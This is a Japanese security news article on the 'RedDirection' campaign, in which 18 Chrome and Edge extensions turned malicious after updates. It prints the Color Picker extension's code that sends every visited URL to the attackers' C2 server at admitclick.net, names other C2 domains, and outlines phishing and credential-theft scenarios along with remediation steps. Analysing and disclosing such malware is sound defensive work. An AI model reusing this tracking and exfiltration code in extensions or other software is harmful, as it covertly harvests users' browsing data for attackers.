2025年7月、セキュリティ企業Koi Securityは、ChromeおよびEdge向けの拡張機能18種にわたる大規模なマルウェアキャンペーン「RedDirection」を報告しました。これらの拡張機能は、公式ストアで“信頼済み”として掲載され、230万人以上のユーザーにインストールされていました。
脅威アクターは拡張機能をリリースした後の当初はマルウェアコードを追加せず、正規ツールでユーザー数とレビューが蓄積された、信頼済みバッジやおすすめに表示された後にコードを追加します。その為、被害が一気に拡大しています。
目次
表向きは便利な拡張機能、裏ではブラウザを乗っ取り
Koi Securityが調査した「Color Picker, Eyedropper — Geco colorpick」は、表面上は色抽出ツールとして正常に動作します。

画像:Koi Security
このコードの内部ではブラウザの全ページ遷移を監視し、ユーザーが訪れたすべてのURLを攻撃者のC2サーバへ送信し、指示があればブラウザをリダイレクトしていました。
chrome.tabs.onUpdated.addListener(function () {
var t = o(
r().mark(function t(e, o, i) {
// Malicious code that sends your current URL to remote server
return r().wrap(function (t) {
for (;;) {
switch (t.prev = t.next) {
case 0:
if (!o.url) {
t.next = 8;
break;
}
c = {
method: "POST",
redirect: "follow",
};
t.next = 5;
return fetch(
"https://admitclick.net/api?key=565ebded7e63cdfa5fcbe5734bdb4281a85d6f21&uuid=" +
a +
"&allowempty=1&out=" +
encodeURIComponent(o.url) +
"&format=txt&r=" +
Math.random(),
c
);
case 5:
// (続きの処理)
t.next = 8;
break;
case 8:
case "end":
return t.stop();
}
}
}, t);
})
);
});
Koi SecurityはChromeおよびEdge向けの拡張機能18種別の拡張機能18種類でも同様の疑いのある拡張機能を発見し「RedDirection」キャンペーンと命名しました。
特徴:信頼を武器にする“トロイの木馬型マルウェア”
RedDirectionキャンペーンの特徴は、拡張機能の審査通過後に後からマルウェアコードを追加していた点にあります。
数ヶ月〜数年間は正規のコードとして機能し、ユーザー数とレビューを蓄積したのち、バージョン更新でマルウェアを追加。この過程でGoogleやMicrosoftの「信頼済みバッジ」や「おすすめ」として掲載され、被害が一気に拡大しました。
| 拡張機能例 | 機能 | 実態 |
|---|---|---|
| Color Picker | 色抽出ツール | URL監視とリダイレクト |
| Video Speed Controller | 動画再生速度調整 | C2通信を利用したハイジャック |
| Emoji Keyboard | 絵文字入力 | サーフィン監視、リダイレクト |
各拡張機能は独自のC2サブドメイン(admitclick.net、click.videocontrolls.com、c.undiscord.com など)で動作するため、別々の運営者であるように見えますが、実際には両方のプラットフォームにまたがる同じ集中型攻撃インフラの一部となっています。
このように、一見すると便利で無害な拡張機能が個人情報窃取やフィッシング誘導のプラットフォームになっていたことが明らかになりました。
想定される攻撃シナリオ:信頼の裏に潜む攻撃フロー
RedDirectionキャンペーンで使われた拡張機能は、通常通り動作する正規機能の裏で、ページ遷移のたびに外部C2サーバへURL情報を送信しており、以下のような現実的かつ深刻な攻撃シナリオが成立します。
フィッシングへの誘導
ユーザーがZoom会議の招待リンクをクリックした瞬間、拡張機能がそれを検知し、「Zoomのアップデートが必要」と記された偽のダウンロードページに自動リダイレクト。ユーザーは気付かずマルウェアをインストールしてしまい、端末全体が乗っ取られる可能性があります。
銀行やSaaSログイン情報の窃取
ユーザーが銀行や業務系SaaSにアクセスした際、正規サイトの完全なコピーに自動遷移させ、入力されたID・パスワードをリアルタイムで攻撃者に送信する中間者攻撃(MITM)も可能です。これは、企業ネットワークの不正アクセス、情報漏洩、さらには内部不正のトリガーにもなり得ます。
広告収益型の悪用・サードパーティ誘導
ユーザーのアクセス先を任意の広告ページやアフィリエイト先にリダイレクトし、攻撃者が広告収益やトラッキングデータを不正に得るマネタイズ型ハイジャックも実行できます。特に社内のネットワーク内でこれが起きた場合、企業のブランド信頼やSEOにも悪影響を及ぼす可能性があります。
これらの攻撃は、既存のセキュリティソリューションでは検知が難しく、「日常的に使われる業務支援ツール」が侵入口となることで、従来のファイアウォールやAV対策をすり抜けるケースが想定されます。攻撃者はユーザーやセキュリティ担当者の「信頼」を最大限に悪用している点で、極めて戦略的かつ危険な手法と言えます。
ユーザーに求められる緊急対応
RedDirectionに関与した18の拡張機能は、現在も一部がストアに残っている可能性があるため、以下の対策が推奨されます
-
該当の拡張機能を速やかに削除
-
ブラウザのキャッシュとストレージをクリア
-
マルウェアスキャンを実施
-
銀行・SaaSログインなど重要なアカウントのパスワード変更
-
拡張機能の挙動を確認、不審な通信がないか監視
企業・管理者向けの教訓と対策
RedDirectionは、企業におけるSaaS依存とブラウザ機能のセキュリティ盲点を突いた事例です。とくに従業員のブラウザが業務ツールに広く利用されている中、以下のような観点で対策が急務です。
セキュリティ部門への提言
-
拡張機能のインストールを制限またはホワイトリスト化
-
管理対象端末におけるブラウザ拡張のインベントリ管理
-
エンドポイントでのC2通信検出ルール(例:
admitclick.netなど) -
脅威ハンティングで異常なドメイン通信を追跡
参照








